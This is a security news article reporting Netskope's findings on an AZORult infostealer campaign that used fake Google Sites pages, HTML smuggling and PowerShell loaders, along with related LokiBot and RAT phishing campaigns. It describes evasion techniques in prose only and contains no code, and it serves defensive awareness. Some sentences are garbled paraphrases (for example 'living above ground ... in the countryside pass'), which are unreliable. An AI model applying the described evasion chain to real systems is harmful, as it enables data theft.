Cybersecurity researchers have discovered a new malware campaign that leverages fake Google Sites pages and HTML smuggling to deploy commercial malware called AZORult to facilitate information theft.
“It uses an unorthodox HTML smuggling technique in which the malicious payload is embedded in a separate JSON file hosted on an external website,” Netskope Threat Labs researcher Jan Michael Alcantara said in a report published last week.
The phishing campaign was not attributed to a specific actor or threat group. The cybersecurity firm described it as a widespread attack, carried out with the intent of collecting sensitive data for sale in clandestine forums.
AZORult, also called PuffStealer and Ruzalto, is an information stealer first detected around 2016. It is typically distributed via phishing and malspam campaigns, Trojanized installers for pirated software or media, and malvertising.
Once installed, it is able to collect credentials, cookies and history from web browsers, screenshots, documents corresponding to a list of specific extensions (.TXT, .DOC, .XLS, .DOCX, .XLSX, .AXX and .KDBX) , and data from 137 cryptocurrency wallets. AXX files are encrypted files created by AxCrypt, while KDBX refers to a password database created by the KeePass password manager.
The latest attack activity involves the threat actor creating spoofed Google Docs pages on Google Sites that then use smuggled HTML to deliver the payload.
HTML smuggling is the name given to a stealthy technique in which the legitimate functionality of HTML5 and JavaScript is abused to assemble and launch malware by “smuggling” an encoded malicious script.
Therefore, when a visitor is tricked into opening the unauthorized page by a phishing email, the browser decodes the script and extracts the payload onto the host device, effectively bypassing typical security controls such as gateways emails that are known to inspect only suspicious attachments.
The AZORult campaign takes this approach to the next level by adding a CAPTCHA barrier, an approach that not only provides a semblance of legitimacy but also serves as an additional layer of protection against URL scanners.
The downloaded file is a link file (.LNK) masquerading as a PDF bank statement, launching which triggers a series of actions to run a series of intermediate batches and PowerShell scripts from an already compromised domain.
One of the PowerShell scripts (“agent3.ps1”) is designed to fetch the AZORult loader (“service.exe”), which, in turn, downloads and executes another PowerShell script (“sd2.ps1”) containing the stealer malware .
“It stealthily runs the AZORult fileless infostealer using reflective code loading, bypassing disk-based detection and minimizing artifacts,” said Michael Alcantara. “It uses an AMSI bypass technique to avoid detection by a variety of host-based anti-malware products, including Windows Defender.”
“Unlike common smuggled files where the blob is already within the HTML code, this campaign copies an encoded payload from a separate compromised site. Using legitimate domains like Google Sites can help trick the victim into believing that the connection is legitimate.”
The findings come as Cofense revealed the use of malicious SVG files by threat actors in recent campaigns to spread Agent Tesla and XWorm using an open source program called AutoSmuggle that simplifies the process of creating HTML or SVG files of smuggling.
AutoSmuggle “takes a file such as an exe or archive and ‘smuggles’ it into the SVG or HTML file so that when the SVG or HTML file is opened, the ‘smuggled’ file is delivered,” the company explained.
Phishing campaigns have also been observed using link files compressed within archive files to propagate LokiBot, an information stealer similar to AZORult with functionality to harvest data from web browsers and cryptocurrency wallets.
“The LNK file executes a PowerShell script to download and run the LokiBot loader executable from a URL. The LokiBot malware has been observed using image steganography, multi-layer packaging, and living above ground (LotL) techniques in the countryside pass,” SonicWall was announced last week.
In another case highlighted by Docguard, malicious shortcut files were discovered to initiate a series of payload downloads and ultimately distribute AutoIt-based malware.
It’s not all. Users in the Latin America region are being targeted as part of a ongoing campaign in which attackers impersonate Colombian government agencies to send booby-trapped emails with PDF documents accusing recipients of violating traffic rules.
Inside the PDF file there is a link which, when clicked, downloads a ZIP archive containing a VBScript. Once executed, VBScript releases a PowerShell script responsible for fetching one of the remote access trojans such as AsyncRAT, njRAT, and Remcos.